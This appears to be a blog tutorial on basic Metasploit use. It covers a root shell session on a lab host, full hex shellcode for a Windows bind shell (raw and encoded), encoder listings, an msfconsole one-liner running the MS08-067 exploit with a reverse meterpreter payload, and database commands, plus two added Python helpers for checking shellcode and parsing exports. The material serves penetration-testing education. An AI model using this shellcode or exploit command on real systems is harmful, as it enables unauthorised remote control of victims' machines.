[*] Command shell session 2 opened (192.168.63.155:53640 -> 192.168.63.156:6200) at 2016-03-11 21:22:39 +0800

whoami
root
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz

Custom Payload

In some cases, we may need custom payloads, like what I did for my Secure Programming class in 2014.

Pick a payload and generate its shellcode (using payload/windows/shell_bind_tcp as the example here):

msf > use payload/windows/shell_bind_tcp
msf payload(shell_bind_tcp) > generate
# windows/shell_bind_tcp - 328 bytes
# http://www.metasploit.com
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" +
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" +
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" +
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" +
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" +
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32" +
"\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff" +
"\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b" +
"\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40\x50\x68" +
"\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89\xe6" +
"\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" +
"\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57" +
"\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" +
"\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" +
"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" +
"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" +
"\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" +
"\x6f\x6a\x00\x53\xff\xd5"

To avoid specific bytes in the shellcode (taking \x00 as the example):

msf payload(shell_bind_tcp) > generate -b '\x00'
# windows/shell_bind_tcp - 355 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\xbf\x41\x3a\x72\xae\xda\xdf\xd9\x74\x24\xf4\x58\x29\xc9" +
"\xb1\x53\x31\x78\x12\x03\x78\x12\x83\x81\x3e\x90\x5b\xfd" +
"\xd7\xd6\xa4\xfd\x27\xb7\x2d\x18\x16\xf7\x4a\x69\x09\xc7" +
"\x19\x3f\xa6\xac\x4c\xab\x3d\xc0\x58\xdc\xf6\x6f\xbf\xd3" +
"\x07\xc3\x83\x72\x84\x1e\xd0\x54\xb5\xd0\x25\x95\xf2\x0d" +
"\xc7\xc7\xab\x5a\x7a\xf7\xd8\x17\x47\x7c\x92\xb6\xcf\x61" +
"\x63\xb8\xfe\x34\xff\xe3\x20\xb7\x2c\x98\x68\xaf\x31\xa5" +
"\x23\x44\x81\x51\xb2\x8c\xdb\x9a\x19\xf1\xd3\x68\x63\x36" +
"\xd3\x92\x16\x4e\x27\x2e\x21\x95\x55\xf4\xa4\x0d\xfd\x7f" +
"\x1e\xe9\xff\xac\xf9\x7a\xf3\x19\x8d\x24\x10\x9f\x42\x5f" +
"\x2c\x14\x65\x8f\xa4\x6e\x42\x0b\xec\x35\xeb\x0a\x48\x9b" +
"\x14\x4c\x33\x44\xb1\x07\xde\x91\xc8\x4a\xb7\x56\xe1\x74" +
"\x47\xf1\x72\x07\x75\x5e\x29\x8f\x35\x17\xf7\x48\x39\x02" +
"\x4f\xc6\xc4\xad\xb0\xcf\x02\xf9\xe0\x67\xa2\x82\x6a\x77" +
"\x4b\x57\x06\x7f\xea\x08\x35\x82\x4c\xf9\xf9\x2c\x25\x13" +
"\xf6\x13\x55\x1c\xdc\x3c\xfe\xe1\xdf\x53\xa3\x6c\x39\x39" +
"\x4b\x39\x91\xd5\xa9\x1e\x2a\x42\xd1\x74\x02\xe4\x9a\x9e" +
"\x95\x0b\x1b\xb5\xb1\x9b\x90\xda\x05\xba\xa6\xf6\x2d\xab" +
"\x31\x8c\xbf\x9e\xa0\x91\x95\x48\x40\x03\x72\x88\x0f\x38" +
"\x2d\xdf\x58\x8e\x24\xb5\x74\xa9\x9e\xab\x84\x2f\xd8\x6f" +
"\x53\x8c\xe7\x6e\x16\xa8\xc3\x60\xee\x31\x48\xd4\xbe\x67" +
"\x06\x82\x78\xde\xe8\x7c\xd3\x8d\xa2\xe8\xa2\xfd\x74\x6e" +
"\xab\x2b\x03\x8e\x1a\x82\x52\xb1\x93\x42\x53\xca\xc9\xf2" +
"\x9c\x01\x4a\x02\xd7\x0b\xfb\x8b\xbe\xde\xb9\xd1\x40\x35" +
"\xfd\xef\xc2\xbf\x7e\x14\xda\xca\x7b\x50\x5c\x27\xf6\xc9" +
"\x09\x47\xa5\xea\x1b"

So we get a payload without \x00, which is understandably longer than the previous one.
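The -b option's job is to keep forbidden bytes out of the output, and that is easy to verify rather than take on trust. As an added Python example (not part of the post or of Metasploit), parse_msf_buf() converts the buf = "\x.." + ... listing that generate prints into bytes, and check_generated() reports the declared versus actual length and the offsets of every forbidden byte it finds. SAMPLE_OUTPUT is a constructed six-byte stand-in in the same layout, not a payload.

```python
import re

# Constructed sample in the same layout as `msf > generate` prints (the
# bytes are arbitrary test data, not a working payload).
SAMPLE_OUTPUT = r'''
# windows/shell_bind_tcp - 6 bytes
# http://www.metasploit.com
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
buf =
"\x41\x00\x42" +
"\x0a\x43\x00"
'''

# Matches the "# <payload> - <n> bytes" header line.
DECLARED_LEN_RE = re.compile(r"^#\s*\S+\s+-\s+(\d+)\s+bytes", re.MULTILINE)


def parse_msf_buf(text):
    """Turn the Ruby-style buf = "\\x.." + "\\x.." listing into bytes."""
    body = text.split("buf =", 1)[1] if "buf =" in text else text
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", body))


def declared_length(text):
    """Length claimed in the header comment, or None if there is no header."""
    m = DECLARED_LEN_RE.search(text)
    return int(m.group(1)) if m else None


def find_bad_chars(buf, bad):
    """Map each forbidden byte value that occurs to the offsets where it occurs."""
    return {b: [i for i, x in enumerate(buf) if x == b] for b in sorted(bad) if b in buf}


def check_generated(text, bad):
    """Report declared vs. actual length and every forbidden-byte occurrence."""
    buf = parse_msf_buf(text)
    hits = find_bad_chars(buf, bad)
    return {
        "declared": declared_length(text),
        "actual": len(buf),
        "bad": hits,
        "clean": not hits,
    }


if __name__ == "__main__":
    print(check_generated(SAMPLE_OUTPUT, {0x00, 0x0a}))
```

Pasting each of the three listings on this page into check_generated() with bad={0x00} should report the first one as not clean (it visibly contains \x00 runs) and the -b '\x00' listing as clean; the length fields confirm the growth from 328 to 355 bytes that the header comments state.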

Then we can apply encoders to the shellcode. To list all available encoders:

msf payload(shell_bind_tcp) > show encoders

Encoders
========

   Name                          Disclosure Date  Rank       Description
   ----                          ---------------  ----       -----------
   cmd/echo                                       good       Echo Command Encoder
   cmd/generic_sh                                 manual     Generic Shell Variable Substitution Command Encoder
   cmd/ifs                                        low        Generic ${IFS} Substitution Command Encoder
   cmd/perl                                       normal     Perl Command Encoder
   cmd/powershell_base64                          excellent  Powershell Base64 Command Encoder
   cmd/printf_php_mq                              manual     printf(1) via PHP magic_quotes Utility Command Encoder
   generic/eicar                                  manual     The EICAR Encoder
   … (omitted)

Generate code with a chosen encoder:

msf payload(shell_bind_tcp) > generate -e x86/nonalpha
# windows/shell_bind_tcp - 470 bytes
# http://www.metasploit.com
# Encoder: x86/nonalpha
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=

or, all together:

msf payload(shell_bind_tcp) > generate -b '\x00' -e x86/alpha_mixed -f output.txt
[*] Writing 3347 bytes to output.txt...
msf payload(shell_bind_tcp) > cat output.txt
[*] exec: cat output.txt

# windows/shell_bind_tcp - 718 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=

Scripting

The Metasploit framework lets users write resource scripts that automate the console. There are three ways to run a script:

  1. Pass the commands directly on the command line, separated by semicolons:

     > msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST [IP]; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST [IP]; run"

  2. Load a resource file when the console starts:

     > msfconsole -r my_script.rc

  3. Load a resource file from inside a running console:

     msf > resource my_script.rc

Database

When conducting a penetration test, it is frequently a challenge to keep track of everything you have done to the target network. This is where having a database configured can be a great timesaver. Metasploit has built-in support for the PostgreSQL database system. (Reference)

Here are some helpful commands:

  • help database
  • hosts
  • services
  • db_nmap: same as nmap, but the results are saved into the current database
  • db_import
  • db_export -f xml [filepath for xml]
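The XML written by `db_export -f xml` can be processed outside the console, for example to build a host and service inventory or to check which hosts still expose a port after remediation. The Python below is an added example, not code from the original post or from Metasploit; the sample document is constructed and assumes the MetasploitV4 export layout (root `MetasploitV4`, `hosts/host` with `address`, `name`, `os_name`, and `services/service` with `port`, `proto`, `state`, `name`, `info`).

```python
import xml.etree.ElementTree as ET

# Constructed sample in the MetasploitV4 export layout (assumed layout,
# not real output from the post): two hosts, one closed service.
SAMPLE_EXPORT = """<MetasploitV4><hosts>
  <host><address>192.0.2.10</address><name>lab-dc</name><os_name>Windows 2008</os_name>
    <services>
      <service><port>445</port><proto>tcp</proto><state>open</state><name>smb</name><info>Microsoft SMB</info></service>
      <service><port>135</port><proto>tcp</proto><state>open</state><name>msrpc</name><info/></service>
      <service><port>23</port><proto>tcp</proto><state>closed</state><name>telnet</name><info/></service>
    </services></host>
  <host><address>192.0.2.20</address><name>lab-web</name><os_name>Linux</os_name>
    <services>
      <service><port>80</port><proto>tcp</proto><state>open</state><name>http</name><info>Apache httpd</info></service>
    </services></host>
</hosts></MetasploitV4>"""


def _text(elem, tag):
    """Child text with whitespace stripped; empty string when the child is absent."""
    return (elem.findtext(tag) or "").strip()


def parse_export(xml_text):
    """Map address -> {name, os, services}, keeping only services whose <state> is open.
    Each service is a (port, proto, name, info) tuple, sorted by port."""
    inventory = {}
    for host in ET.fromstring(xml_text).iterfind("./hosts/host"):
        addr = _text(host, "address")
        if not addr:
            continue  # skip malformed host entries rather than aborting the report
        services = []
        for svc in host.iterfind("./services/service"):
            if _text(svc, "state") != "open" or not _text(svc, "port").isdigit():
                continue
            services.append((int(_text(svc, "port")), _text(svc, "proto"),
                             _text(svc, "name"), _text(svc, "info")))
        inventory[addr] = {"name": _text(host, "name"), "os": _text(host, "os_name"),
                           "services": sorted(services)}
    return inventory


def hosts_exposing(inventory, port, proto="tcp"):
    """Addresses with the given port open, e.g. port 445 to review SMB exposure."""
    return sorted(addr for addr, h in inventory.items()
                  if any(p == port and pr == proto for p, pr, _, _ in h["services"]))
```

Feed it the real export file with `parse_export(open(path).read())`; closed services are dropped, so the result reflects only what the scan actually saw listening.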

Conclusion

Metasploit is a powerful tool that lets people launch attacks with the aid of its exploit database. Although this post only covers the basic usage of Metasploit with one example, which hardly does justice to its strength, I will keep updating it whenever I find something new and worth sharing.